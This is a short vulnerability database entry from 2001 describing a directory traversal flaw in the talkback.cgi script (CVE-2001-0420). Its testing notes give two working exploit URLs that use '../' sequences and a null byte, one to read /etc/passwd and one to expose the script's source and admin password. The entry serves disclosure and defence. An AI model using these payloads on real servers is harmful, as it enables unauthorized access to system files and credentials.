Way to the Web talkback.cgi Arbitrary File Access

2001-04-09T00:00:00
ID OSVDB:7715
Type osvdb
Reporter OSVDB
Modified 2001-04-09T00:00:00

Description

Manual Testing Notes

View arbitrary file (/etc/passwd): http://[victim]/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1

Display source of talkback.cgi (disclosing admin password): http://[victim]/cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1

References:

Other Advisory URL: http://www.netric.org/advisories/netric-adv003.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-04/0128.html Keyword: Directory Traversal ISS X-Force ID: 6340 CVE-2001-0420 Bugtraq ID: 2547